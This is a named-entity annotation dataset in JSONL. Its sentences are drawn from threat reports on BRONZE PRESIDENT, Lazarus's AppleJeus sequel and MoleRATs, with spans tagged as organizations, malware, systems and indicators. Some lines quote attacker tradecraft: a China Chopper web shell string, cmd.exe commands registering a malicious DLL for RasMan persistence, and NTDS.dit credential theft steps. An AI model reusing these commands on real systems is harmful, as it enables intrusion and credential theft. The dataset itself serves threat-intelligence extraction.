{"text": "BRONZE PRESIDENT installs PlugX using DLL side-loading .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 26, "end": 31, "label": "Malware"}, {"start": 38, "end": 41, "label": "System"}]}
{"text": "In June and August 2019 , BRONZE PRESIDENT delivered PlugX via government and law enforcement-themed phishing lures .", "spans": [{"start": 26, "end": 42, "label": "Organization"}, {"start": 53, "end": 58, "label": "Malware"}]}
{"text": "ORat \u2014 CTU researchers have only observed this basic loader tool in the context of BRONZE PRESIDENT intrusions .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 7, "end": 10, "label": "Organization"}, {"start": 83, "end": 99, "label": "Organization"}]}
{"text": "ORat is the name assigned by the malware author , as denoted by the program debug database string in the analyzed sample : D:\\vswork\\Plugin\\ORat\\build\\Release\\ORatServer\\Loader.pdb .", "spans": [{"start": 0, "end": 4, "label": "Malware"}]}
{"text": "The tool uses the Windows Management Instrumentation ( WMI ) event consumer for persistence by installing a script to the system's WMI registry .", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 26, "end": 52, "label": "System"}, {"start": 55, "end": 58, "label": "System"}, {"start": 131, "end": 134, "label": "System"}]}
{"text": "Messages sent from ORat to its command and control ( C2 ) server start with the string \"VIEWS0018x\" .", "spans": [{"start": 19, "end": 23, "label": "Malware"}, {"start": 31, "end": 50, "label": "System"}, {"start": 53, "end": 55, "label": "System"}]}
{"text": "If the data received from the C2 server starts with the same string , then the remainder of the payload is decompressed using ORat 's \"deflate\" algorithm and called as a function .", "spans": [{"start": 30, "end": 32, "label": "System"}, {"start": 126, "end": 130, "label": "Malware"}]}
{"text": "ORat acts as a flexible loader tool rather than a fully featured remote access tool .", "spans": [{"start": 0, "end": 4, "label": "Malware"}]}
{"text": "RCSession \u2014 This basic RAT is installed via DLL side-loading , and CTU researchers observed BRONZE PRESIDENT installing it on multiple hosts during intrusions .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 44, "end": 47, "label": "System"}, {"start": 67, "end": 70, "label": "Organization"}, {"start": 92, "end": 108, "label": "Organization"}]}
{"text": "RCSession was extracted from a file called English.rtf and launched via a hollowed svchost.exe process .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 43, "end": 54, "label": "Indicator"}, {"start": 83, "end": 94, "label": "Indicator"}]}
{"text": "RCSession connects to its C2 server via a custom protocol , can remotely execute commands , and can launch additional tools .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 26, "end": 28, "label": "System"}]}
{"text": "CTU researchers have no evidence of other threat actors using RCSession or of wide proliferation of the tool , suggesting it may be exclusively used by BRONZE PRESIDENT .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 62, "end": 71, "label": "Malware"}, {"start": 152, "end": 168, "label": "Organization"}]}
{"text": "Nbtscan \u2014 This publicly available command-line tool scans systems for NetBIOS name information ( see Figure 2 ) .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 70, "end": 77, "label": "Indicator"}]}
{"text": "In an example observed by CTU researchers , the Nbtscan executable was named Adobe.exe and was installed in several working directories on compromised hosts , including : C:\\Recovery\\ .", "spans": [{"start": 26, "end": 29, "label": "Organization"}, {"start": 48, "end": 55, "label": "System"}, {"start": 77, "end": 86, "label": "Indicator"}]}
{"text": "Nmap \u2014 BRONZE PRESIDENT used this freely available network scanning tool from the C:\\PerfLogs\\ folder .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 7, "end": 23, "label": "Organization"}]}
{"text": "Wmiexec \u2014 This publicly available tool uses WMI to create SYSTEM-level shells on remote hosts .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 44, "end": 47, "label": "System"}]}
{"text": "While analyzing hosts compromised by BRONZE PRESIDENT , CTU researchers identified other malware artifacts .", "spans": [{"start": 37, "end": 53, "label": "Organization"}, {"start": 56, "end": 59, "label": "Organization"}]}
{"text": "Although there was no evidence of the group using the malware , the threat actors may have leveraged its access or capabilities during earlier phases of the intrusions .", "spans": []}
{"text": "The BRONZE PRESIDENT intrusions observed by CTU researchers appear to have taken place over several months or years .", "spans": [{"start": 4, "end": 20, "label": "Organization"}, {"start": 44, "end": 47, "label": "Organization"}]}
{"text": "China Chopper web shell files named error404.aspx included the \"eval (Request.Item[\"|\"] ,\"unsafe\" ) ; \" string .", "spans": [{"start": 6, "end": 13, "label": "System"}, {"start": 36, "end": 49, "label": "Indicator"}]}
{"text": "To successfully interact with the web shell , a threat actor sent HTTP requests that included the \"|\" parameter .", "spans": [{"start": 66, "end": 70, "label": "Indicator"}]}
{"text": "The web shell files appeared to be installed during the timeframe that BRONZE PRESIDENT was active on the system .", "spans": [{"start": 71, "end": 87, "label": "Organization"}]}
{"text": "CTU researchers identified a variety of post-compromise tools stored under %AppData% ( e.g. , \\AppData\\Roaming\\Temp ) on several compromised systems .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "The widespread proliferation and use of the following tools suggest that the group likely has the knowledge and capability to use them as part of its operations :", "spans": []}
{"text": "Powerview.ps1 \u2014 This PowerShell-based module for network reconnaissance is part of the PowerSploit penetration testing framework .", "spans": [{"start": 0, "end": 13, "label": "Indicator"}, {"start": 21, "end": 37, "label": "System"}, {"start": 87, "end": 98, "label": "System"}]}
{"text": "PVE Find AD User \u2014 This command-line tool identifies login locations of Active Directory ( AD ) users .", "spans": [{"start": 0, "end": 16, "label": "System"}, {"start": 72, "end": 88, "label": "System"}, {"start": 91, "end": 93, "label": "System"}]}
{"text": "AdFind \u2014 This command-line tool conducts AD queries .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 41, "end": 43, "label": "System"}]}
{"text": "NetSess \u2014 This publicly available tool enumerates NetBIOS sessions .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 50, "end": 57, "label": "System"}]}
{"text": "Netview \u2014 This tool enumerates networks .", "spans": [{"start": 0, "end": 7, "label": "System"}]}
{"text": "TeamViewer \u2014 This remote control and desktop-sharing tool has applications for legitimate and malicious system users .", "spans": [{"start": 0, "end": 10, "label": "System"}]}
{"text": "Its installation in a temporary directory alongside network reconnaissance and enumeration tools likely indicates malicious intent .", "spans": []}
{"text": "At the time of detection , observed BRONZE PRESIDENT incidents had likely been ongoing for several months or even years .", "spans": [{"start": 36, "end": 52, "label": "Organization"}]}
{"text": "As a result , CTU researchers were unable to ascertain the initial access vector .", "spans": [{"start": 14, "end": 17, "label": "Organization"}]}
{"text": "In October 2019 , third-party researchers described a phishing campaign that used C2 infrastructure that CTU researchers attribute to BRONZE PRESIDENT .", "spans": [{"start": 82, "end": 84, "label": "System"}, {"start": 105, "end": 108, "label": "Organization"}, {"start": 134, "end": 150, "label": "Organization"}]}
{"text": "This connection suggests that the group uses phishing emails with ZIP attachments that contain LNK files as an initial access vector .", "spans": [{"start": 54, "end": 60, "label": "System"}, {"start": 66, "end": 69, "label": "System"}, {"start": 95, "end": 98, "label": "System"}]}
{"text": "During one intrusion , the threat actors gained administrator access to all systems within a targeted business unit and installed their remote access tools on 80% of the hosts .", "spans": []}
{"text": "The group installed multiple tools within the environment , including three different tools on a strategically important server , likely to provide contingency access options .", "spans": []}
{"text": "During multiple intrusions , the threat actors employed various tools and techniques to understand the network environments .", "spans": []}
{"text": "For example , they used Nmap to scan various internal IP address ranges and SMB ports .", "spans": [{"start": 24, "end": 28, "label": "System"}, {"start": 76, "end": 79, "label": "Indicator"}]}
{"text": "They also relied on Nbtscan , net user , and ping commands to obtain insights and identify opportunities for lateral movement .", "spans": []}
{"text": "BRONZE PRESIDENT regularly leverages Wmiexec to move laterally .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 37, "end": 44, "label": "System"}]}
{"text": "During one intrusion , the threat actors extensively used this tool to execute WMI commands on remote hosts in the environment .", "spans": [{"start": 79, "end": 82, "label": "System"}]}
{"text": "The threat actors retrieved the NTDS.dit file from the volume shadow copy .", "spans": [{"start": 32, "end": 40, "label": "Indicator"}]}
{"text": "NTDS.dit contains Active Directory data , including password hashes for all users on a domain .", "spans": [{"start": 0, "end": 8, "label": "Indicator"}, {"start": 18, "end": 34, "label": "System"}]}
{"text": "Extracting hashes from the NTDS.dit file requires access to the SYSTEM file in the system registry .", "spans": [{"start": 27, "end": 35, "label": "Indicator"}]}
{"text": "The threat actors saved both the SYSTEM file ( system.hive ) and NTDS.dit in the compromised host's c:\\windows\\temp directory .", "spans": [{"start": 47, "end": 58, "label": "Indicator"}, {"start": 65, "end": 73, "label": "Indicator"}]}
{"text": "These files were likely exfiltrated and exploited offline to retrieve user password hashes , which could then be cracked or used to perform pass-the-hash attacks .", "spans": []}
{"text": "BRONZE PRESIDENT 's C2 techniques are dictated by its remote access tools .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 20, "end": 22, "label": "System"}]}
{"text": "The group's primary and likely proprietary RCSession RAT communicates with a hard-coded C2 server using a custom protocol over TCP port 443 .", "spans": [{"start": 43, "end": 52, "label": "Malware"}, {"start": 88, "end": 90, "label": "System"}, {"start": 127, "end": 130, "label": "Indicator"}]}
{"text": "After connecting to its C2 server , RCSession checks in with an encrypted beacon and then awaits instruction .", "spans": [{"start": 24, "end": 26, "label": "System"}, {"start": 36, "end": 45, "label": "Malware"}]}
{"text": "The ORat tool , which appears to be used less frequently by the group , communicates over TCP port 80 using a raw socket protocol ( not HTTP ) .", "spans": [{"start": 4, "end": 8, "label": "Malware"}, {"start": 90, "end": 93, "label": "Indicator"}, {"start": 136, "end": 140, "label": "Indicator"}]}
{"text": "The Cobalt Strike tool has malleable C2 profiles .", "spans": [{"start": 4, "end": 17, "label": "System"}, {"start": 37, "end": 39, "label": "System"}]}
{"text": "During one intrusion , it connected to multiple C2 domains on TCP port 80 , including mail . svrchost . com , using the following request .", "spans": [{"start": 48, "end": 50, "label": "System"}, {"start": 62, "end": 65, "label": "Indicator"}]}
{"text": "Subsequent Cobalt Strike C2 servers included subdomains of svchosts . com , svrchost . com , and strust . club .", "spans": [{"start": 11, "end": 24, "label": "System"}, {"start": 25, "end": 27, "label": "System"}]}
{"text": "Some BRONZE PRESIDENT C2 domains analyzed by CTU researchers were hosted on infrastructure owned by Dutch VPS provider Host Sailor , Hong Kong-based New World Telecoms , and Malaysia-based Shinjiru Technology ( see Figure 7 ) .", "spans": [{"start": 5, "end": 21, "label": "Organization"}, {"start": 22, "end": 24, "label": "System"}, {"start": 45, "end": 48, "label": "Organization"}, {"start": 106, "end": 109, "label": "System"}]}
{"text": "The threat actors have used discrete infrastructure clusters that share matching hosting and registration characteristics .", "spans": []}
{"text": "The pattern of infrastructure hosting suggests that the group parks its domains when not in use , an operational security technique that limits exposure of the group's overall hosting infrastructure .", "spans": []}
{"text": "Some of BRONZE PRESIDENT 's malware has persistence capabilities .", "spans": [{"start": 8, "end": 24, "label": "Organization"}]}
{"text": "For example , ORat uses a WMI event consumer to maintain its presence on a compromised host .", "spans": [{"start": 14, "end": 18, "label": "Malware"}, {"start": 26, "end": 29, "label": "System"}]}
{"text": "The group also creates and maintains scheduled tasks to achieve this purpose .", "spans": []}
{"text": "Figure 8 shows a Sysdriver scheduled task that periodically executes a Cobalt Strike payload .", "spans": [{"start": 71, "end": 84, "label": "System"}]}
{"text": "The threat actors tend to install malware on a large proportion of hosts during their intrusions .", "spans": []}
{"text": "However , the group exercises restraint and defensive evasion tactics to minimize opportunities for network defenders to detect or investigate its activities .", "spans": []}
{"text": "For example , the threat actors deleted volume shadow copies after using them for NTDS.dit retrieval .", "spans": [{"start": 82, "end": 90, "label": "Indicator"}]}
{"text": "BRONZE PRESIDENT targets specific data types .", "spans": [{"start": 0, "end": 16, "label": "Organization"}]}
{"text": "The threat actors use custom batch scripts to create a list of files with predefined criteria and collate the identified files into a .rar archive ( see Figure 9 ) .", "spans": [{"start": 134, "end": 138, "label": "Indicator"}]}
{"text": "CTU researchers have observed BRONZE PRESIDENT batch scripts named doc.bat , xls.bat , xlsx.bat , ppt.bat , pptx.bat , pdf.bat , and txt.bat .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 46, "label": "Organization"}, {"start": 67, "end": 74, "label": "Indicator"}, {"start": 77, "end": 84, "label": "Indicator"}, {"start": 87, "end": 95, "label": "Indicator"}, {"start": 98, "end": 105, "label": "Indicator"}, {"start": 108, "end": 116, "label": "Indicator"}, {"start": 119, "end": 126, "label": "Indicator"}, {"start": 133, "end": 140, "label": "Indicator"}]}
{"text": "The group also uses the all.bat batch script to collect all files stored on a specific user's desktop .", "spans": [{"start": 24, "end": 31, "label": "Indicator"}]}
{"text": "CTU researchers observed RCSession and Cobalt Strike on systems that BRONZE PRESIDENT targeted for data theft .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 25, "end": 34, "label": "Malware"}, {"start": 39, "end": 52, "label": "System"}, {"start": 69, "end": 85, "label": "Organization"}]}
{"text": "Either of these tools could have been used to exfiltrate the archived data .", "spans": []}
{"text": "BRONZE PRESIDENT has demonstrated intent to steal data from organizations using tools such as Cobalt Strike , PlugX , ORat , and RCSession .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 94, "end": 107, "label": "System"}, {"start": 110, "end": 115, "label": "Malware"}, {"start": 118, "end": 122, "label": "Malware"}, {"start": 129, "end": 138, "label": "Malware"}]}
{"text": "The concurrent use of so many tools during a single intrusion suggests that the group could include threat actors with distinct tactics , roles , and tool preferences .", "spans": []}
{"text": "It is likely that BRONZE PRESIDENT has additional unobserved operational tools and capabilities .", "spans": [{"start": 18, "end": 34, "label": "Organization"}]}
{"text": "CTU researchers recommend that organizations apply controls to mitigate common intrusion techniques and behaviors along with controls that address the tools and techniques discussed in this analysis .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "PlugX C2 server : ipsoftwarelabs.com .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 6, "end": 8, "label": "System"}, {"start": 18, "end": 36, "label": "Indicator"}]}
{"text": "RCSession C2 server : toshibadrive.com .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 10, "end": 12, "label": "System"}, {"start": 22, "end": 38, "label": "Indicator"}]}
{"text": "ORat and Cobalt Strike C2 server : strust.club .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 9, "end": 22, "label": "System"}, {"start": 23, "end": 25, "label": "System"}, {"start": 35, "end": 46, "label": "Indicator"}]}
{"text": "Cobalt Strike C2 server : svchosts.com , svrhosts.com .", "spans": [{"start": 0, "end": 13, "label": "System"}, {"start": 14, "end": 16, "label": "System"}, {"start": 26, "end": 38, "label": "Indicator"}, {"start": 41, "end": 53, "label": "Indicator"}]}
{"text": "Cobalt Strike download location : 116.93.154.250 .", "spans": [{"start": 0, "end": 13, "label": "System"}, {"start": 34, "end": 48, "label": "Indicator"}]}
{"text": "ORat malware sample : a0758535cf8eb689782b95d3791d23d5 , 774a9c3ff01a3e734b7bec0c312120126295fad9 , 2e8762c984468ee309dad30a6c5f6d3308676ac721357da442a8a5b9d9d65d82 .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 22, "end": 54, "label": "Indicator"}, {"start": 57, "end": 97, "label": "Indicator"}, {"start": 100, "end": 164, "label": "Indicator"}]}
{"text": "Cobalt Strike payload : 7101fff478290d4db8a1c11a8d3b40cb , 4c81777551a772218519fb6dd1a6672aade4a936 , bdf1452b55b9974f3e9a4aea4439769a02fd931660ed655df92519a2a4df1261 .", "spans": [{"start": 0, "end": 13, "label": "System"}, {"start": 24, "end": 56, "label": "Indicator"}, {"start": 59, "end": 99, "label": "Indicator"}, {"start": 102, "end": 166, "label": "Indicator"}]}
{"text": "Modified DLL file ( goopdate.dll ) used by BRONZE PRESIDENT to install RCSession : 0617cad9e5d559356c43d4037c86227f , f14eaf5d648aebb2ed7b00b2cf4349263b30fb1c , 2ea9ccf653f63bcc3549a313ec9d0bada341556cc32dd2ca4b73e0c034492740 .", "spans": [{"start": 9, "end": 12, "label": "System"}, {"start": 20, "end": 32, "label": "Indicator"}, {"start": 43, "end": 59, "label": "Organization"}, {"start": 71, "end": 80, "label": "Malware"}, {"start": 83, "end": 115, "label": "Indicator"}, {"start": 118, "end": 158, "label": "Indicator"}, {"start": 161, "end": 225, "label": "Indicator"}]}
{"text": "Operation AppleJeus Sequel , Lazarus continues to attack the cryptocurrency business with enhanced capabilities .", "spans": [{"start": 29, "end": 36, "label": "Organization"}]}
{"text": "The Lazarus group is currently one of the most active and prolific APT actors .", "spans": [{"start": 4, "end": 11, "label": "Organization"}]}
{"text": "In 2018 , Kaspersky published a report on one of their campaigns , named Operation AppleJeus .", "spans": []}
{"text": "Notably , this operation marked the first time Lazarus had targeted macOS users , with the group inventing a fake company in order to deliver their manipulated application and exploit the high level of trust among potential victims .", "spans": [{"start": 47, "end": 54, "label": "Organization"}, {"start": 68, "end": 73, "label": "System"}]}
{"text": "As a result of our ongoing efforts , we identified significant changes to the group \u2019s attack methodology .", "spans": []}
{"text": "To attack macOS users , the Lazarus group has developed homemade macOS malware , and added an authentication mechanism to deliver the next stage payload very carefully , as well as loading the next-stage payload without touching the disk .", "spans": [{"start": 10, "end": 15, "label": "System"}, {"start": 28, "end": 35, "label": "Organization"}, {"start": 65, "end": 70, "label": "System"}]}
{"text": "In addition , to attack Windows users , they have elaborated a multi-stage infection procedure , and significantly changed the final payload .", "spans": [{"start": 24, "end": 31, "label": "System"}]}
{"text": "We assess that the Lazarus group has been more careful in its attacks following the release of Operation AppleJeus and they have employed a number of methods to avoid being detected .", "spans": [{"start": 19, "end": 26, "label": "Organization"}]}
{"text": "After releasing Operation AppleJeus , the Lazarus group continued to use a similar modus operandi in order to compromise cryptocurrency businesses .", "spans": [{"start": 42, "end": 49, "label": "Organization"}]}
{"text": "We found more macOS malware similar to that used in the original Operation AppleJeus case .", "spans": [{"start": 14, "end": 19, "label": "System"}]}
{"text": "This macOS malware used public source code in order to build crafted macOS installers .", "spans": [{"start": 5, "end": 10, "label": "System"}, {"start": 69, "end": 74, "label": "System"}]}
{"text": "The malware authors used QtBitcoinTrader developed by Centrabit .", "spans": [{"start": 25, "end": 40, "label": "System"}, {"start": 54, "end": 63, "label": "Organization"}]}
{"text": "These three macOS installers use a similar post installer script in order to implant a mach-o payload , as well as using the same command-line argument when executing the fetched second-stage payload .", "spans": [{"start": 12, "end": 17, "label": "System"}, {"start": 87, "end": 93, "label": "System"}]}
{"text": "However , they have started changing their macOS malware .", "spans": [{"start": 43, "end": 48, "label": "System"}]}
{"text": "We recognized a different type of macOS malware , MarkMakingBot.dmg ( be37637d8f6c1fbe7f3ffc702afdfe1d ) , created on 2019-03-12 .", "spans": [{"start": 34, "end": 39, "label": "System"}, {"start": 50, "end": 67, "label": "Indicator"}, {"start": 70, "end": 102, "label": "Indicator"}]}
{"text": "It doesn\u2019t have an encryption/decryption routine for network communication .", "spans": []}
{"text": "We speculate that this is an intermediate stage in significant changes to their macOS malware .", "spans": [{"start": 80, "end": 85, "label": "System"}]}
{"text": "During our ongoing tracking of this campaign , we found that one victim was compromised by Windows AppleJeus malware in March 2019 .", "spans": [{"start": 91, "end": 98, "label": "System"}]}
{"text": "Unfortunately , we couldn\u2019t identify the initial installer , but we established that the infection started from a malicious file named WFCUpdater.exe .", "spans": [{"start": 135, "end": 149, "label": "Indicator"}]}
{"text": "At that time , the actor used a fake website : wfcwallet.com .", "spans": [{"start": 47, "end": 60, "label": "Indicator"}]}
{"text": "The actor used a multi-stage infection like before , but the method was different .", "spans": []}
{"text": "The infection started from .NET malware , disguised as a WFC wallet updater ( a9e960948fdac81579d3b752e49aceda ) .", "spans": [{"start": 57, "end": 60, "label": "Organization"}, {"start": 78, "end": 110, "label": "Indicator"}]}
{"text": "Upon execution , this .NET executable checks whether the command line argument is \u201c /Embedding \u201d or not .", "spans": [{"start": 22, "end": 26, "label": "Indicator"}]}
{"text": "This malware is responsible for decrypting the WFC.cfg file in the same folder with a hardcoded 20-byte XOR key .", "spans": [{"start": 47, "end": 54, "label": "Indicator"}]}
{"text": "This mimics the wallet updater connected to the C2 addresses : wfcwallet.com ( resolved ip : 108.174.195.134 ) , www.chainfun365.com ( resolved ip : 23.254.217.53 ) .", "spans": [{"start": 48, "end": 50, "label": "System"}, {"start": 63, "end": 76, "label": "Indicator"}, {"start": 93, "end": 108, "label": "Indicator"}, {"start": 113, "end": 132, "label": "Indicator"}, {"start": 149, "end": 162, "label": "Indicator"}]}
{"text": "After that , it carries out the malware operator \u2019s commands in order to install the next stage permanent payload .", "spans": []}
{"text": "The actor delivered two more files into the victim \u2019s system folder : rasext.dll and msctfp.dat .", "spans": [{"start": 70, "end": 80, "label": "Indicator"}, {"start": 85, "end": 95, "label": "Indicator"}]}
{"text": "They used the RasMan ( Remote Access Connection Manager ) Windows service to register the next payload with a persistence mechanism .", "spans": [{"start": 14, "end": 20, "label": "System"}, {"start": 23, "end": 55, "label": "System"}, {"start": 58, "end": 65, "label": "System"}]}
{"text": "After fundamental reconnaissance , the malware operator implanted the delivered payload by manually using the following commands :", "spans": []}
{"text": "cmd.exe /c dir rasext.dll , cmd.exe /c dir msctfp.dat , cmd.exe /c tasklist /svc | findstr RasMan , cmd.exe /c reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\RasMan\\ThirdParty /v DllName /d rasext.dll /f .", "spans": [{"start": 0, "end": 7, "label": "Indicator"}, {"start": 15, "end": 25, "label": "Indicator"}, {"start": 28, "end": 35, "label": "Indicator"}, {"start": 43, "end": 53, "label": "Indicator"}, {"start": 56, "end": 63, "label": "Indicator"}, {"start": 91, "end": 97, "label": "System"}, {"start": 100, "end": 107, "label": "Indicator"}, {"start": 204, "end": 214, "label": "Indicator"}]}
{"text": "In order to establish remote tunneling , the actor delivered more tools , executing with command-line parameters .", "spans": []}
{"text": "Unfortunately , we have had no chance to obtain this file , but we speculate that Device.exe is responsible for opening port 6378 , and the CenterUpdater.exe tool was used for creating tunneling to a remote host .", "spans": [{"start": 82, "end": 92, "label": "Indicator"}, {"start": 140, "end": 157, "label": "Indicator"}]}
{"text": "Note that the 104.168.167.16 server is used as a C2 server .", "spans": [{"start": 14, "end": 28, "label": "Indicator"}, {"start": 49, "end": 51, "label": "System"}]}
{"text": "The fake website hosting server for the UnionCryptoTrader case will be described next .", "spans": [{"start": 40, "end": 57, "label": "System"}]}
{"text": "We also found a Windows version of the UnionCryptoTrader ( 0f03ec3487578cef2398b5b732631fec ) .", "spans": [{"start": 16, "end": 23, "label": "System"}, {"start": 39, "end": 56, "label": "System"}, {"start": 59, "end": 91, "label": "Indicator"}]}
{"text": "It was executed from the Telegram messenger download folder :", "spans": [{"start": 25, "end": 33, "label": "System"}]}
{"text": "C:\\Users\\[user name]\\Downloads\\Telegram Desktop\\UnionCryptoTraderSetup.exe .", "spans": [{"start": 40, "end": 74, "label": "Indicator"}]}
{"text": "We also found the actor \u2019s Telegram group on their fake website .", "spans": [{"start": 27, "end": 35, "label": "System"}]}
{"text": "Based on these , we assess with high confidence that the actor delivered the manipulated installer using the Telegram messenger .", "spans": [{"start": 109, "end": 117, "label": "System"}]}
{"text": "Unfortunately , we can\u2019t get all the related files as some payloads were only executed in memory .", "spans": []}
{"text": "However , we can reassemble the whole infection procedure based on our telemetry .", "spans": []}
{"text": "The overall infection procedure was very similar to the WFCWallet case , but with an added injection procedure , and they only used the final backdoor payload instead of using a tunneling tool .", "spans": [{"start": 56, "end": 65, "label": "System"}]}
{"text": "The UnionCryptoTrader Windows version has the following window showing a price chart for several cryptocurrency exchanges .", "spans": [{"start": 4, "end": 21, "label": "System"}, {"start": 22, "end": 29, "label": "System"}, {"start": 56, "end": 62, "label": "System"}]}
{"text": "The Windows version of UnionCryptoTrader updater ( 629b9de3e4b84b4a0aa605a3e9471b31 ) has similar functionality to the macOS version .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 23, "end": 40, "label": "System"}, {"start": 51, "end": 83, "label": "Indicator"}, {"start": 119, "end": 124, "label": "System"}]}
{"text": "According to the build path ( Z:\\Loader\\x64\\Release\\WinloaderExe.pdb ) , the malware author called this malware a loader .", "spans": []}
{"text": "Upon launch , the malware retrieves the victim \u2019s basic system information , sending it in the following HTTP POST format , as is the case with the macOS malware .", "spans": [{"start": 105, "end": 109, "label": "Indicator"}, {"start": 148, "end": 153, "label": "System"}]}
{"text": "If the response code from the C2 server is 200 , the malware decrypts the payload and loads it in memory .", "spans": [{"start": 30, "end": 32, "label": "System"}]}
{"text": "Finally , the malware sends the act=done value and return code .", "spans": []}
{"text": "The next stage payload ( e1953fa319cc11c2f003ad0542bca822 ) , downloaded from this loader , is similar to the .NET downloader in the WFCWallet case .", "spans": [{"start": 25, "end": 57, "label": "Indicator"}, {"start": 110, "end": 114, "label": "System"}, {"start": 133, "end": 142, "label": "System"}]}
{"text": "This malware is responsible for decrypting the Adobe.icx file in the same folder .", "spans": [{"start": 47, "end": 56, "label": "Indicator"}]}
{"text": "It injects the next payload into the Internet Explorer process , and the tainted iexplore.exe process carries out the attacker \u2019s commands .", "spans": [{"start": 81, "end": 93, "label": "Indicator"}]}
{"text": "The final payload ( dd03c6eb62c9bf9adaf831f1d7adcbab ) is implanted manually as in the WFCWallet case .", "spans": [{"start": 20, "end": 52, "label": "Indicator"}, {"start": 87, "end": 96, "label": "System"}]}
{"text": "This final payload was designed to run only on certain systems .", "spans": []}
{"text": "It seems that the malware authors produced and delivered malware that only works on specific systems based on previously collected information .", "spans": []}
{"text": "The malware checks the infected system \u2019s information and compares it to a given value .", "spans": []}
{"text": "It seems the actor wants to execute the final payload very carefully , and wants to evade detection by behavior-based detection solutions .", "spans": []}
{"text": "This Windows malware loads the encrypted msctfp.dat file in a system folder , and loads each configuration value .", "spans": [{"start": 5, "end": 12, "label": "System"}, {"start": 41, "end": 51, "label": "Indicator"}]}
{"text": "Then it executes an additional command based on the contents of this file .", "spans": []}
{"text": "When the malware communicates with the C2 server , it uses a POST request with several predefined headers .", "spans": [{"start": 39, "end": 41, "label": "System"}]}
{"text": "Finally , the malware downloads the next stage payload , decrypting it and possibly executing it with the Print parameter .", "spans": []}
{"text": "We speculate that the DLL type payload will be downloaded and call its Print export function for further infection .", "spans": [{"start": 22, "end": 25, "label": "System"}]}
{"text": "We can\u2019t get hold of the final payload that \u2019s executed in memory , but we believe its backdoor-type malware is ultimately used to control the infected victim .", "spans": []}
{"text": "We were able to identify several victims in this Operation AppleJeus sequel .", "spans": []}
{"text": "Victims were recorded in the UK , Poland , Russia and China .", "spans": []}
{"text": "Moreover , we were able to confirm that several of the victims are linked to cryptocurrency business entities .", "spans": []}
{"text": "The actor altered their macOS and Windows malware considerably , adding an authentication mechanism in the macOS downloader and changing the macOS development framework .", "spans": [{"start": 24, "end": 29, "label": "System"}, {"start": 34, "end": 41, "label": "System"}, {"start": 107, "end": 112, "label": "System"}, {"start": 141, "end": 146, "label": "System"}]}
{"text": "The binary infection procedure in the Windows system differed from the previous case .", "spans": [{"start": 38, "end": 45, "label": "System"}]}
{"text": "They also changed the final Windows payload significantly from the well-known Fallchill malware used in the previous attack .", "spans": [{"start": 28, "end": 35, "label": "System"}, {"start": 78, "end": 87, "label": "Malware"}]}
{"text": "We believe the Lazarus group \u2019s continuous attacks for financial gain are unlikely to stop anytime soon .", "spans": [{"start": 15, "end": 22, "label": "Organization"}]}
{"text": "Since the initial appearance of Operation AppleJeus , we can see that over time the authors have changed their modus operandi considerably .", "spans": []}
{"text": "NEW CYBER ESPIONAGE CAMPAIGNS TARGETING PALESTINIANS Over the last several months , the Cybereason Nocturnus team has been tracking recent espionage campaigns targeting the Middle East .", "spans": [{"start": 88, "end": 108, "label": "Organization"}]}
{"text": "These campaigns are specifically directed at entities and individuals in the Palestinian territories .", "spans": []}
{"text": "This investigation shows multiple similarities to previous attacks attributed to a group called MoleRATs ( aka The Gaza Cybergang ) , an Arabic-speaking , politically motivated group that has operated in the Middle East since 2012 .", "spans": [{"start": 96, "end": 104, "label": "Organization"}, {"start": 115, "end": 129, "label": "Organization"}]}
{"text": "In our analysis , we distinguish between two separate campaigns happening simultaneously .", "spans": []}
{"text": "These campaigns differ in tools , server infrastructure , and nuances in decoy content and intended targets .", "spans": []}
{"text": "The Spark Campaign : This campaign uses social engineering to infect victims , mainly from the Palestinian territories , with the Spark backdoor .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 130, "end": 144, "label": "Malware"}]}
{"text": "This backdoor first emerged in January 2019 and has been continuously active since then .", "spans": []}
{"text": "The campaign \u2019s lure content revolves around recent geopolitical events , espeically the Israeli-Palestinian conflict , the assassination of Qasem Soleimani , and the ongoing conflict between Hamas and Fatah Palestinian movements .", "spans": []}
{"text": "The Pierogi Campaign : This campaign uses social engineering attacks to infect victims with a new , undocumented backdoor dubbed Pierogi .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 129, "end": 136, "label": "Malware"}]}
{"text": "This backdoor first emerged in December 2019 , and was discovered by Cybereason .", "spans": [{"start": 69, "end": 79, "label": "Organization"}]}
{"text": "In this campaign , the attackers use different TTPs and decoy documents reminiscent of previous campaigns by MoleRATs involving the Micropsia and Kaperagent malware .", "spans": [{"start": 109, "end": 117, "label": "Organization"}, {"start": 132, "end": 141, "label": "Malware"}, {"start": 146, "end": 156, "label": "Malware"}]}
{"text": "In part one of this research , we analyze the Spark campaign .", "spans": [{"start": 46, "end": 51, "label": "Malware"}]}
